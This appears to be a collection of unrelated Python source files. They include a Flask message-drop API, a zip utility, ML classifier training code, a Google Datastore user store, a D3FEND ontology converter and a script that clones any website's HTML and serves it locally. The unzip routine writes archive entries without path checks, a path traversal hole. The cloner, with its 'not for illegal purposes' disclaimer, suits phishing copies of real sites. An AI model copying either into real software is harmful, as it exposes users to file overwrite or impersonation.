# Define the function for the TO endpoint
class to_app(Resource):
def get(self, yeet):
# Add document to DB collection
document = {"time": time.time(), "yeet_name": yeet, "data": request.args.get('data')}
collection.insert_one(copy.copy(document))
# Return document with success message
document["success"] = True
return document
# Define the function for the FROM endpoint
class from_app(Resource):
def get(self, yeet):
# Get most recent document with that yeet name and check if it exists
document = collection.find_one({"yeet_name": yeet})
if not (document is None):
# If it exists, create response and delete document
response = {"time_created": document["time"], "time_fetched": time.time(), "yeet_name": yeet, "data": document["data"], "success": True}
collection.delete_one({"yeet_name": yeet})
else:
# If it doesn't exist, return a message
response = {"success": False, "error": "That yeet does not exist, it could have expired or someone could have read it already."}
return response
api.add_resource(to_app, '/to/<yeet>')
api.add_resource(from_app, '/from/<yeet>')
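# Example usage once the server is running (illustrative values only; any yeet
# name and data string will do):
#
#   curl 'http://localhost:8080/to/mysecret?data=hello'
#   curl 'http://localhost:8080/from/mysecret'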
if __name__ == '__main__':
app.run(port='8080')
|
from tweetguessr.tweetguessr import TweetGuessr
args = vars(TweetGuessr.parse_arguments())
tweetguessr = TweetGuessr(args)
tweetguessr.main(args)
|
#!/usr/bin/env python
# (c) 2017-2018, ETH Zurich, Institut fuer Theoretische Physik
# Author: Dominik Gresch <greschd@gmx.ch>
import numpy as np
import pymatgen as mg
import pymatgen.symmetry.analyzer
import symmetry_representation as sr
POS_In = (0, 0, 0)
POS_As = (0.25, 0.25, 0.25)
orbitals = []
for spin in (sr.SPIN_UP, sr.SPIN_DOWN):
orbitals.extend([
sr.Orbital(position=POS_In, function_string=fct, spin=spin)
for fct in sr.WANNIER_ORBITALS['s'] + sr.WANNIER_ORBITALS['p']
])
orbitals.extend([
sr.Orbital(position=POS_As, function_string=fct, spin=spin)
for fct in sr.WANNIER_ORBITALS['p']
])
structure = mg.Structure(
lattice=[[0., 3.029, 3.029], [3.029, 0., 3.029], [3.029, 3.029, 0.]],
species=['In', 'As'],
coords=np.array([[0, 0, 0], [0.25, 0.25, 0.25]])
)
analyzer = mg.symmetry.analyzer.SpacegroupAnalyzer(structure)
symops = analyzer.get_symmetry_operations(cartesian=False)
symops_cart = analyzer.get_symmetry_operations(cartesian=True)
symmetry_group = sr.SymmetryGroup(
symmetries=[
sr.SymmetryOperation.from_orbitals(
orbitals=orbitals,
real_space_operator=sr.RealSpaceOperator.
from_pymatgen(sym_reduced),
rotation_matrix_cartesian=sym_cart.rotation_matrix,
numeric=True
) for sym_reduced, sym_cart in zip(symops, symops_cart)
],
full_group=True
)
sr.io.save(symmetry_group, 'symmetries.hdf5')
|
#!/usr/bin/env python
#coding: utf8
"""Zipper
A class that can zip and unzip files.
"""
__author__ = "José Lopes de Oliveira Júnior"
__license__ = "GPLv3+"
import os
import zipfile
try:
import zlib
has_zlib = True
except ImportError:
has_zlib = False
class Zipper(object):
"""This is the main class.
Can zip and unzip files.
"""
def zip(self, file_to_zip, dir="./", name="Zipped_File.zip", mode="w"):
"""Zips file into dir with name.
Mode can be w to write a new file or
a to append in an existing file.
"""
if not name.endswith(".zip"):
name += ".zip"
if has_zlib:
compression = zipfile.ZIP_DEFLATED
else:
compression = zipfile.ZIP_STORED
zf = zipfile.ZipFile(os.path.join(dir, name), mode)
zf.write(file_to_zip, compress_type=compression)
zf.close()
def unzip(self, file_to_unzip, dir="./"):
"""Unzips file into dir."""
zf = zipfile.ZipFile(file_to_unzip)
for content in zf.namelist():
if content.endswith('/'):
os.makedirs(os.path.join(dir, content))
else:
out_file= open(os.path.join(dir, content), "wb")
out_file.write(zf.read(content))
out_file.close()
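# Minimal usage sketch (hedged illustration only; the file names below are
# placeholders and the target directory is assumed to exist):
#
#   z = Zipper()
#   z.zip("notes.txt", dir="./", name="notes.zip")
#   z.unzip("notes.zip", dir="./")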
#EOF
|
import unittest
from talipp.indicators import SMMA
from TalippTest import TalippTest
class Test(TalippTest):
def setUp(self) -> None:
self.input_values = list(TalippTest.CLOSE_TMPL)
def test_init(self):
ind = SMMA(20, self.input_values)
print(ind)
self.assertAlmostEqual(ind[-3], 9.149589, places = 5)
self.assertAlmostEqual(ind[-2], 9.203610, places = 5)
self.assertAlmostEqual(ind[-1], 9.243429, places = 5)
def test_update(self):
self.assertIndicatorUpdate(SMMA(20, self.input_values))
def test_delete(self):
self.assertIndicatorDelete(SMMA(20, self.input_values))
def test_purge_oldest(self):
self.assertIndicatorPurgeOldest(SMMA(20, self.input_values))
if __name__ == '__main__':
unittest.main()
|
import glob
import json
import elasticsearch as es
from elasticsearch import helpers
es_client = es.Elasticsearch(["es01:9200"])
# TODO: POST setup.json if index doesn't exist.
if not es_client.indices.exists("articles"):
body = json.load(open("setup.json"))
es_client.indices.create("articles", body)
N=100
body = []
for f in glob.glob("/input/articles_v6.json.split-*"):
print(f)
with open(f, "r") as fin:
n=0
for line in fin:
doc = json.loads(line)
if "abstract" in doc["_source"] and doc["_source"]['abstract'] == {}:
doc["_source"]["abstract"] = ''
body.append({'_index': "articles", '_id': doc['_id'], "_source": doc['_source']})
if len(body) == N:
n+=N
print(n)
try:
es.helpers.bulk(es_client, body, request_timeout=30, max_retries=5, max_chunk_bytes=50)
except es.exceptions.ConnectionTimeout:
print("!!WARNING!! - Timeout indexing documents! Skipping this chunk.")
except es.exceptions.RequestError:
print("!!WWARNING!! - malformed article.")
body = []
if body:
es.helpers.bulk(es_client, body, request_timeout=30, max_retries=5)
|
try:
import requests
except ImportError:
print('Requests Module Not Found !!')
imp = input('Do You Want To Install Requests? y/n ')
if imp in ('y', 'Y'):
import os
os.system('pip install requests')
os.system('clear')
os.system('clear')
os.system('clear')
print('Installation Completed!')
print('Now Checking Flask Module')
try:
from flask import Flask
print('Program Starting..... ')
import os
import time
time.sleep(.45)
os.system('clear')
except ImportError:
print('Flask Module Not Found ')
imp = input('Do You Want To Install Flask? y/n ')
if imp in ('y', 'Y'):
import os
os.system('pip install flask')
os.system('clear')
os.system('clear')
os.system('clear')
print('Installation Completed')
else:
exit();
#Importing
import time
col = '\033[1;31;40m'
def logo():
a = '''
┏┓╋┏┓╋╋╋╋╋╋╋╋╋╋┏━━┓╋╋╋┏━┳┓
┃┗┳┛┣━┳━┳━┓┏┳━━┫━┳┫┏━┓┃━┫┣┓
┗┓┃┏┫╋┃━┫╋┗┫┗┳━┫┏┫┗┫╋┗╋━┃━┫
╋┗━┛┗━┻━┻━━┻━┛╋┗┛┗━┻━━┻━┻┻┛'''
print(a)
print(col + ':::::::::::::Coded By Rc:::::::::::::')
print(":::::This Program Is Created For Testing Purposes. Don't Use It For Any Illegal Purposes:::::")
time.sleep(1)
os.system('clear')
time.sleep(1)
os.system('clear')
print('\n>>>>>>>>>>>>>>>>Welcome To Vocal-Flask!!!<<<<<<<<<<<<<<<<<')
logo()
print('')
site = input('Enter Website URL Here : ')
try:
req = requests.get(site)
src = req.text
time.sleep(.34)
print("Getting Website's Source Code")
except:
print('Url Not Found Or Your Internet Is Not Available')
exit();
with open('src.html', 'w') as sorc:
r = sorc.write(src)
time.sleep(.65)
print('Saving Source Code As src.html')
time.sleep(.23)
print('Moving The File To Template Folder ')
os.system('mv -f src.html templates')
time.sleep(.65)
print('File Moved Successfully!')
time.sleep(.45)
os.system('clear')
logo()
print("")
vol= '\033[3;37;40m'
print('Starting LocalHost At Port 5000')
print(vol + 'Localhost Started At Port Number 5000\nOpen 127.0.0.1:5000 In Your Browser To See The Website')
print('\n')
from flask import Flask, render_template
app = Flask(__name__)
@app.route("/")
def hello():
return render_template('src.html')
app.run()
os.system('clear')
logo()
print('')
|
import fasttext
import os
import pandas as pd
import numpy as np
import pickle
from tqdm import tqdm
from scipy.stats import sem
from prettytable import PrettyTable
# Tensorflow
import tensorflow as tf
from tensorflow import keras
import kerastuner as kt
from kerastuner.tuners import Hyperband
# Scikit-learn
from sklearn.model_selection import GridSearchCV, RepeatedStratifiedKFold, cross_val_score, cross_validate
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVC
from sklearn.neighbors import KNeighborsClassifier
from .config import *
from . import utility as ut
from .data_preprocessing import Preprocessing
def createFasttextModel(filename: str):
path: str = os.path.join("../", CONFIG.OUTPUT_DIRECTORY_NAME)
ft_model = fasttext.train_supervised(os.path.join(path, filename), \
dim=CONFIG.FT_DIMS, lr=0.5, epoch=10, verbose=1)
ft_model.save_model(os.path.join(path, 'ft_model.ftz'))
return ft_model
def _recall(y_true, y_pred):
y_true = np.ones_like(y_true)
true_positives = np.sum(np.round(np.clip(y_true * y_pred, 0, 1)))
all_positives = np.sum(np.round(np.clip(y_true, 0, 1)))
recall = true_positives / (all_positives + keras.backend.epsilon())
return recall
def _precision(y_true, y_pred):
y_true = np.ones_like(y_true)
true_positives = np.sum(np.round(np.clip(y_true * y_pred, 0, 1)))
predicted_positives = np.sum(np.round(np.clip(y_pred, 0, 1)))
precision = true_positives / (predicted_positives + keras.backend.epsilon())
return precision
def _f1_score(y_true, y_pred):
precision = _precision(y_true, y_pred)
recall = _recall(y_true, y_pred)
return 2*((precision*recall)/(precision+recall+keras.backend.epsilon()))
def nn_tune_train(data: pd.DataFrame, model_names: list)->dict:
num_classes = len(data.label.unique())
with tqdm(total=num_classes) as bar:
for X_train, X_test, y_train, y_test, label in ut.data_split_classwise(data):
bar.set_description(f'Tuning on model {label}')
for name in model_names:
tuner = Hyperband(
_build_model,
objective='val_loss',
max_epochs=50,
factor=3,
directory='hyperband',
project_name=f'slp{label}'
)
tuner.search(X_train, y_train, epochs=50, validation_data=(X_test, y_test))
best_hps = tuner.get_best_hyperparameters(num_trials=1)[0]
print(f"{name} optimal params: {best_hps}")
bar.update(1)
def _build_model(hp):
kernel_initializer_list = [
'glorot_uniform',
'glorot_normal',
'he_normal',
'he_uniform'
]
hp_learning_rate = hp.Choice('learning_rate', values=[1e-2, 1e-3, 1e-4])
hp_kernel_init = hp.Choice('kernel_initializer', values=kernel_initializer_list, \
default='glorot_normal')
model = keras.Sequential([
keras.layers.Dense(units=1, input_shape=(150,), \
kernel_initializer=hp_kernel_init, activation='sigmoid')
])
model.compile(optimizer=keras.optimizers.Adam(learning_rate=hp_learning_rate), \
loss='binary_crossentropy', metrics=['accuracy', _f1_score])
return model
def nn_modelTrain(data: pd.DataFrame, models: dict)-> dict:
'''Trains the models passed to the function on the dataframe provided.
'''
num_classes = len(data.label.unique())
with tqdm(total=num_classes) as bar:
for X_train, X_test, y_train, y_test, label in ut.data_split_classwise(data):
bar.set_description(f'Working on model {label}')
models[label]['history'] = models[label]['model'].fit(X_train, y_train, batch_size=20, \
epochs=50, validation_data=(X_test, y_test), \
verbose=0)
bar.update(1)
print("Saving models to disk...")
for m_name in models.keys():
models[m_name]['model'].save(f"../{CONFIG.NN_OUTPUT_DIRECTORY_NAME}{m_name}")
return models
def nn_modelPredict(command: str, ft_model, preprocess_obj: Preprocessing, models=None, model_names=None) -> str:
test_command_preprocessed = preprocess_obj.strpreprocessing(command)
test_command_vec = ft_model.get_sentence_vector(test_command_preprocessed)
test_command_vec = np.reshape(test_command_vec, (1, -1))
print(test_command_preprocessed)
table = PrettyTable()
table.field_names = ['Model Name', 'Predicted Probability']
proba_list = []
models_list = model_names if models is None else list(models.keys())
models = dict() if models is None else models
if len(models) == 0:
for name in model_names:
models.setdefault(name, {'model': None})
models[name]['model'] = keras.models.load_model(f"../{CONFIG.NN_OUTPUT_DIRECTORY_NAME}{name}")
for m_name in models_list:
prediction_proba = models[m_name]['model'].predict(test_command_vec)
proba_list.extend(prediction_proba[0])
table.add_row([ut.map_label(m_name), prediction_proba[0][0]])
final_prediction: str = models_list[np.argmax(proba_list)] if np.max(proba_list) > CONFIG.THRESHOLD else "Other"
print(table)
print('\nFinal Prediction: ', final_prediction)
return final_prediction
def predict(command: str, ft_model, filename: str) -> str:
# devicePresent: bool = ut.device_exists(command, ft_model)
# if devicePresent:
if filename:
loaded_model = pickle.load(open(filename, 'rb'))
command_vec = np.reshape(ft_model.get_sentence_vector(command), (1, -1))
result_proba = np.max(loaded_model.predict_proba(command_vec)[0])
if result_proba > CONFIG.THRESHOLD:
return loaded_model.classes_[np.argmax(loaded_model.predict_proba(command_vec)[0])]
else:
return 'Other'
# else:
# return 'Other'
def createPerceptronModels(model_names: list):
''' Create a perceptron for the number of models (model names or classes) passed as arguments
'''
modelDict = dict()
for name in model_names:
model = keras.Sequential([
keras.layers.Dense(units=1, input_shape=(150,), \
kernel_initializer=keras.initializers.GlorotNormal(), activation='sigmoid')
])
modelDict.setdefault(name, {'model': None})
modelDict[name]['model'] = model
return modelDict
def train(train_df: pd.DataFrame):
'''Creates and trains the models with the data passed as arguments
'''
classifierList = [
{
'model_name': SVC.__name__,
'model': SVC(probability=True, random_state=40),
'parameters': dict(C = [10e-5, 10e-4, 10e-3, 10e-2, 10e-1, 1, 10e1, 10e2, 10e4],
kernel=['linear', 'rbf', 'poly']),
'filename': '../' + CONFIG.OUTPUT_DIRECTORY_NAME + CONFIG.SVM_MODEL_SAVEFILE
},
{
'model_name': LogisticRegression.__name__,
'model': LogisticRegression(random_state=40),
'parameters': dict(C = [10e-5, 10e-4, 10e-3, 10e-2, 10e-1, 1, 10e1, 10e2, 10e4],
multi_class = ['ovr', 'multinomial'],
solver=['liblinear', 'newton-cg', 'sag', 'saga', 'lbfgs']),
'filename': '../' + CONFIG.OUTPUT_DIRECTORY_NAME + CONFIG.LR_MODEL_SAVEFILE
},
{
'model_name': KNeighborsClassifier.__name__,
'model': KNeighborsClassifier(),
'parameters': dict(n_neighbors = range(4, 9), # 9 is exclusive
weights = ['uniform', 'distance'],
algorithm=['ball_tree', 'kd_tree']),
'filename': '../' + CONFIG.OUTPUT_DIRECTORY_NAME + CONFIG.KNN_MODEL_SAVEFILE
}
]
classifiers = {}
table = PrettyTable()
table.field_names = ['Model Name', 'Train Accuracy']
X_train, y_train = train_df['sent_vec'].tolist(), train_df['y']
# print(X_train.shape, y_train.shape)
with tqdm(total=3) as bar:
for clfDetail in classifierList:
bar.set_description(f"Tuning {clfDetail['model_name']}")
clf = GridSearchCV(estimator=clfDetail['model'], param_grid=clfDetail['parameters'])
clf.fit(X_train, y_train)
classifiers[clfDetail['model_name']] = {
'model': clf,
'best_estimators': clf.best_estimator_,
'filename': clfDetail['filename'],
'train_accuracy': clf.score(X_train, y_train)
}
table.add_row([clfDetail['model_name'], clf.score(X_train, y_train)])
# print(f"\nModel: {clfDetail['model_name']}, Train Accuracy: {clf.score(X_train, y_train)}")
bar.update(1)
# Save the classifiers
for clf_name in classifiers.keys():
pickle.dump(classifiers[clf_name]['model'], open(classifiers[clf_name]['filename'], 'wb'))
print(table)
return classifiers
def test(classifiers: dict, test_df):
test_results = {}
X_test, y_test = test_df['sent_vec'].tolist(), test_df['y']
for clf_name in classifiers.keys():
clf = pickle.load(open(classifiers[clf_name]['filename'], 'rb'))
test_accuracy = clf.score(X_test, y_test)
test_results[clf_name] = {
'test_accuracy': test_accuracy
}
print(f"\nModel: {clf_name}, Test Accuracy: {test_accuracy}")
return test_results
def cross_val(classifiers: dict, train_df, test_df):
'''Performs Cross Validation using the classifiers passed to this function
and prints the performance of each classifier in terms of -
mean Accuracy and Standard Error
'''
cv = RepeatedStratifiedKFold(n_splits=5, n_repeats=5, random_state=40)
clf_scores = {}
X_train, y_train = train_df['sent_vec'].tolist(), train_df['label']
for clf_name in classifiers:
# for repeat in tqdm(range(1,16)):
model = classifiers[clf_name]['best_estimators']
# scores = _evaluate_model(model, X_train, y_train)
# scores = cross_val_score(model, X_train, y_train, scoring='f1_macro', cv=cv)
scores = cross_validate(model, X_train, y_train,
scoring=['precision_macro', 'recall_macro', 'accuracy', 'f1_macro'],
cv=5, return_train_score=True)
clf_scores[clf_name] = scores
# print(f"F1 {clf_name} - {np.mean(scores):0.3f} ({sem(scores)})")
return clf_scores
def _evaluate_model(model, X, y, repeats):
'''A Private function called to evaluate the passed model with
RepeatedStratified K-Fold CV using the repeats passed as argument.
Returns: scores
'''
cv = RepeatedStratifiedKFold(n_splits=10, n_repeats=repeats, random_state=40)
scores = cross_val_score(model, X, y, scoring='accuracy', cv=cv)
return scores
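# Minimal usage sketch (hedged illustration only: it assumes train/test dataframes
# with 'sent_vec' and 'y' columns have been prepared elsewhere, e.g. via
# data_preprocessing; the file name and variable names are placeholders):
#
#   ft_model = createFasttextModel("train.txt")
#   classifiers = train(train_df)
#   test(classifiers, test_df)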
|
#!/usr/bin/python
# Copyright 2017 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Simple tcp flow aggregation."""
import argparse
import os.path
import sys
from common import __version__
from packet_dumper import PacketDumper
from plotter import Plotter
def get_options(argv):
"""Generic option parser.
Args:
argv: list containing arguments
Returns:
argparse.ArgumentParser - generated option object
"""
# init parser
parser = argparse.ArgumentParser(description='rttcp flow aggregator.')
subparsers = parser.add_subparsers()
# independent sub-commands
parser_help = subparsers.add_parser('help', help='show help screen')
parser_help.set_defaults(subcommand='help')
parser_anal = subparsers.add_parser('analyze', help='analyze pcap file')
parser_anal.set_defaults(subcommand='analyze')
parser_plot = subparsers.add_parser('plot', help='plot analysis file')
parser_plot.set_defaults(subcommand='plot')
# common arguments
for p in (parser, parser_anal, parser_plot):
p.add_argument('-d', '--debug', action='count',
dest='debug', default=0,
help='Increase verbosity (use multiple times for more)',)
p.add_argument('--quiet', action='store_const',
dest='debug', const=-1,
help='Zero verbosity',)
p.add_argument('-v', '--version', action='version',
version=__version__)
p.add_argument('--tshark', dest='tshark',
default='tshark',
metavar='TSHARK',
help='tshark binary',)
p.add_argument('-i', '--input', dest='infile', default=None,
metavar='INPUT-FILE',
help='input file',)
p.add_argument('-o', '--output', dest='outfile', default=None,
metavar='OUTPUT-FILE',
help='output file',)
p.add_argument('--type', action='store',
dest='analysis_type', default='flow',
metavar='ANALYSIS_TYPE',
help='set the analysis type (flow, packet)')
p.add_argument('--src-reverse', dest='src_reverse', default=None,
metavar='SRC-REVERSE',
help='treat any packet from this src definition (cidr) as reverse',)
# plot-only arguments
parser_plot.add_argument('--title', action='store',
dest='plot_title', default='',
metavar='PLOT_TITLE',
help='set the plot title')
parser_plot.add_argument('--format', action='store',
dest='plot_format', default='pdf',
metavar='PLOT_FORMAT',
help='set the plot format')
# do the parsing
options = parser.parse_args(argv[1:])
if options.subcommand == 'help':
parser.print_help()
sys.exit(0)
return options
def main(argv):
# parse options
options = get_options(argv)
# get infile/outfile
if options.infile in (None, '-'):
options.infile = sys.stdin
else:
# ensure file exists
assert os.path.isfile(options.infile), (
'File %s does not exist' % options.infile)
if options.outfile in (None, '-'):
options.outfile = sys.stdout
# print results
if options.debug > 0:
sys.stderr.write('%s\n' % options)
# do something
if options.subcommand == 'analyze':
packet_dumper = PacketDumper(options.tshark,
options.infile,
options.outfile,
options.analysis_type,
options.debug)
packet_dumper.run()
elif options.subcommand == 'plot':
plotter = Plotter(options.infile,
options.outfile,
options.analysis_type,
options.plot_format,
options.plot_title,
options.src_reverse,
options.debug)
plotter.run()
if __name__ == '__main__':
main(sys.argv)
|
#!/usr/bin/env python
import Tkinter as Tk
root=Tk.Tk()
b=Tk.Button(root,
text="Hello!!",
)
b.pack()
cb=Tk.BooleanVar()
def disable_b():
if cb.get()==True:
b['state']='disabled'
else:
b['state']='normal'
c=Tk.Checkbutton(root,
text="disabled",
variable=cb,
command=disable_b
)
c.pack()
root.mainloop()
|
#here's where we'll interact with gcloud datastore to manage the database
from google.cloud import datastore
import data
_USER_ENTITY = 'ideaHubUser'
_IDEA_ENTITY = 'idea'
def _get_client():
"""Build a datastore client."""
return datastore.Client()
def log(msg):
"""Log a simple message."""
print('ideaHub datastore: %s' % msg)
def _load_key(client, entity_type, entity_id=None, parent_key=None):
"""Load a datastore key using a particular client, and if known, the ID.
Note that the ID should be an int - we're allowing datastore to generate
them in this example.
Here we are initializing the key:
if we know the entity_id then we build it from entity_type, entity_id, and parent_key,
otherwise datastore generates an ID for us.
Parameters
-----------
client:
the datastore client used to build the key
entity_type: str
the kind of entity the key refers to
entity_id:
the ID of the entity, if it is already known
parent_key:
the key of the parent entity, if any
Returns
--------
Returns the datastore key for the entity
"""
key = None
if entity_id:
key = client.key(entity_type, entity_id, parent=parent_key)
else:
# this will generate an ID
key = client.key(entity_type)
return key
def _load_entity(client, entity_type, entity_id, parent_key=None):
"""Load a datstore entity using a particular client, and the ID."""
key = _load_key(client, entity_type, entity_id, parent_key)
entity = client.get(key)
log('retrieved entity for ' + str(entity_id))
return entity
def load_user(username, passwordhash):
"""Load a user based on the passwordhash; if the passwordhash doesn't match
the username, then this should return None.
Parameters
-----------
username: str
The username given by login.html
passwordhash: str
The password hash given by login.html, checked against the stored hash for that username
Returns
--------
Returns the user if the hash matches the username, and None if it doesn't
"""
client = _get_client()
q = client.query(kind=_USER_ENTITY)
q.add_filter('username', '=', username)
q.add_filter('passwordhash', '=', passwordhash)
for user in q.fetch():
return data.User(user['username'], user['email'], user['owned_ideas'], user['followed_ideas'])
return None
def load_idea(title):
"""
Load an idea by its title.
Parameters
-----------
title: str
The title of the idea to look up
Returns
--------
Returns the idea if one with that title exists, otherwise None
"""
client = _get_client()
q = client.query(kind=_IDEA_ENTITY)
q.add_filter('title', '=', title)
for r in q.fetch():
return data.Idea(r['owner'], r['title'], r['date'], r['description'], r['image'], r['tags'])
return None
def load_all_ideas():
"""Returns all ideas in the databse. Could take a long time if there are millions of ideas, but thats a good problem
because then we've made it big and have millions of dollars"""
client = _get_client()
q = client.query(kind=_IDEA_ENTITY)
idea_list = []
for r in q.fetch():
idea_list.append(data.Idea(r['owner'], r['title'], r['date'], r['description'], r['image'], r['tags']))
return idea_list
def load_user_owned_ideas(username):
"""Return a list of titles of a user's owned ideas .
Here is where we load all the ideas made by the user
Parameters
-----------
username: str
The username is based from the entity. If it exists return all the ideas made by the owner
Returns
--------
Returns all the ideas made by the username
"""
user = _load_entity(_get_client(), _USER_ENTITY, username)
if user:
return user['owned_ideas']
else:
return []
def load_user_followed_ideas(username):
"""Return a list of titles of a user's followed ideas .
Here is where we load all the ideas followed by the username
Parameters
-----------
username: str
The username is based from the entity. If it exists return all the ideas followed by the owner
Returns
--------
Returns all the ideas followed by the user
"""
user = _load_entity(_get_client(), _USER_ENTITY, username)
if user:
return user['followed_ideas']
else:
return []
def save_user(user, passwordhash):
"""Save the user details to the datastore (passed as a user object shown in data.py)
Parameters
-----------
user:
data struct of the user being saved into the entity
passwordhash: str
The password hash to associate with the username
Returns
--------
Saves the user entity to the datastore so it can be loaded later
"""
client = _get_client()
entity = datastore.Entity(_load_key(client, _USER_ENTITY, user.username))
entity['username'] = user.username
entity['email'] = user.email
entity['passwordhash'] = passwordhash
entity['owned_ideas'] = user.owned_ideas
entity['followed_ideas'] = user.followed_ideas
client.put(entity)
def save_idea(idea):
"""Save an idea object (shown in data.py) to the databse"""
client = _get_client()
entity = datastore.Entity(_load_key(client, _IDEA_ENTITY))
entity['owner'] = idea.owner
entity['title'] = idea.title
entity['date'] = idea.projdate
entity['description'] = idea.description
entity['image'] = idea.image
entity['tags'] = idea.tags
client.put(entity)
def save_user_owned_ideas(username, ideas):
"""Save a list of ideas as the user's owned ideas (ideas should be a list of Strings representing the title of an idea)"""
client = _get_client()
user = _load_entity(client, _USER_ENTITY, username)
if user:
user['owned_ideas'] = ideas
client.put(user)
def save_user_followed_ideas(username, ideas):
"""Save a list of ideas as the user's owned ideas (ideas should be a list of Strings representing the title of an idea)"""
client = _get_client()
user = _load_entity(client, _USER_ENTITY, username)
if user:
user['followed_ideas'] = ideas
client.put(user)
def add_idea_to_user(username, idea):
"""Adds an idea (again, by title) to a user's list of owned ideas"""
client = _get_client()
user = _load_entity(client, _USER_ENTITY, username)
if user:
user['owned_ideas'].append(idea)
client.put(user)
def add_followed_idea_to_user(username, idea):
"""Adds an idea (again, by title) to a user's list of owned ideas"""
client = _get_client()
user = _load_entity(client, _USER_ENTITY, username)
if user:
user['followed_ideas'].append(idea)
client.put(user)
def user_exists_check(username):
"""Determine if a username already exists"""
client = _get_client()
q = client.query(kind=_USER_ENTITY)
q.add_filter('username', '=', username)
result = None
for user in q.fetch():
result = user
return result
def email_exists_check(email):
"""Determine if an email already exists"""
client = _get_client()
q = client.query(kind=_USER_ENTITY)
q.add_filter('email', '=', email)
result = None
for email in q.fetch():
result = email
return result
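# Minimal usage sketch (hedged illustration only: it assumes a configured Google
# Cloud project and that the caller computes the password hash; values below are
# placeholders, and data.User's signature is inferred from load_user above):
#
#   save_user(data.User('alice', 'alice@example.com', [], []), passwordhash)
#   user = load_user('alice', passwordhash)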
|
import sublime
import sublime_plugin
if int(sublime.version()) < 3000:
from sublime_haskell_common import attach_sandbox, get_cabal_project_dir_and_name_of_view, get_setting
else:
from SublimeHaskell.sublime_haskell_common import attach_sandbox, get_cabal_project_dir_and_name_of_view, get_setting
class SublimeHaskellAutobuild(sublime_plugin.EventListener):
def on_post_save(self, view):
auto_build_enabled = get_setting('enable_auto_build')
auto_check_enabled = get_setting('enable_auto_check')
auto_lint_enabled = get_setting('enable_auto_lint')
cabal_project_dir, cabal_project_name = get_cabal_project_dir_and_name_of_view(view)
# auto build enabled and file within a cabal project
if auto_build_enabled and cabal_project_dir is not None:
view.window().run_command('sublime_haskell_build_auto')
# try to ghc-mod check
elif get_setting('enable_ghc_mod'):
if auto_check_enabled and auto_lint_enabled:
view.window().run_command('sublime_haskell_ghc_mod_check_and_lint')
elif auto_check_enabled:
view.window().run_command('sublime_haskell_ghc_mod_check')
elif auto_lint_enabled:
view.window().run_command('sublime_haskell_ghc_mod_lint')
def current_cabal_build():
"""Current cabal build command"""
args = []
if get_setting('use_cabal_dev'):
args += ['cabal-dev']
else:
args += ['cabal']
args += ['build']
return attach_sandbox(args)
|
#!/usr/bin/env python3
"""
A module to work with MITRE D3FEND
"""
import argparse
import csv
import logging
from rdflib import Graph, Namespace
from rdflib.namespace import OWL, RDFS, RDF
D3FEND_JSON_LD = "https://d3fend.mitre.org/ontologies/d3fend.json"
D3FEND_NAMESPACE = "http://d3fend.mitre.org/ontologies/d3fend.owl#"
D3FEND_URL_PREFIX = "https://d3fend.mitre.org/technique/d3f"
logging.basicConfig(format='%(asctime)s - %(levelname)s: %(message)s',
level=logging.INFO)
LOGGER = logging.getLogger(__name__)
def generate_csv(args):
"""
Generates a CSV file from MITRE D3FEND JSON-LD content.
:param args: Input arguments.
"""
LOGGER.info('Transforming MITRE D3FEND JSON-LD to CSV...')
rows = []
row_header = [
"d3fend-id",
"tactic",
"label",
"definition",
"how-it-works",
"url"
]
graph = Graph()
LOGGER.debug("Loading d3fend.json from %s", D3FEND_JSON_LD)
graph.parse(location=D3FEND_JSON_LD, format='json-ld')
graph.namespace_manager.bind('rdf', RDF)
graph.namespace_manager.bind('owl', OWL)
graph.namespace_manager.bind('rdfs', RDFS)
d3fend = Namespace(D3FEND_NAMESPACE)
graph.bind('d3fend', d3fend)
for tactic in graph.subjects(RDFS.subClassOf, d3fend.DefensiveTactic):
for technique_l1 in graph.subjects(d3fend.enables, tactic):
for technique_l2 in graph.subjects(RDFS.subClassOf, technique_l1):
kb_article = graph.value(subject=technique_l2, predicate=d3fend["kb-article"])
how_it_works = ""
kb_article = kb_article.split('##') if kb_article else []
for article in kb_article:
if "How it works" in article:
how_it_works = article.replace("How it works", '').strip()
break
row = [
graph.value(subject=technique_l2, predicate=d3fend["d3fend-id"]), # de3fend-id
graph.value(subject=tactic, predicate=RDFS.label), # tactic
"{}: {}".format(
graph.value(subject=technique_l1, predicate=RDFS.label),
graph.value(subject=technique_l2, predicate=RDFS.label)
), # label
graph.value(subject=technique_l2, predicate=d3fend.definition), # definition
how_it_works, # how-it-works
"{}:{}".format(D3FEND_URL_PREFIX, technique_l2.split('#')[1]) # url
]
LOGGER.debug(row)
rows.append(row)
with open(args.output, 'w') as output_file:
csv_writer = csv.writer(output_file)
csv_writer.writerow(row_header)
csv_writer.writerows(rows)
LOGGER.info("%s has been generated successfully.", args.output)
if __name__ == '__main__':
try:
main_parser = \
argparse.ArgumentParser(
description="""This script is used to load MITER D3FEND ontology and work with it.""")
subparsers = main_parser.add_subparsers(title="Commands",
help="Available commands")
csv_parser = subparsers.add_parser("csv", help="Generates CSV file")
csv_parser.add_argument('-o', '--output', default='d3fend.csv', type=str,
help="Output csv file name. Default 'd3fend.csv'")
csv_parser.add_argument('-v', '--verbose', default=False, action='store_true',
help="More verbose")
csv_parser.set_defaults(func=generate_csv)
arguments = main_parser.parse_args()
if arguments.verbose:
LOGGER.setLevel(logging.DEBUG)
arguments.func(arguments)
except Exception as ex: # pylint: disable=broad-except
LOGGER.error(ex)
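# Example invocation (assuming this script is saved as d3fend.py; the file name
# is an assumption, not part of the source):
#
#   python d3fend.py csv -o d3fend.csv -v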
|
"""
Copyright 2013, 2014 Ricardo Tubio-Pardavila
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
__author__ = 'rtubiopa@calpoly.edu'
import datetime
from datetime import timedelta as py_td
import ephem
import logging
import numpy
from services.common import gis, misc
logger = logging.getLogger('common')
class OrbitalSimulator(object):
"""
This class holds all the methods necessary for the simulation of the
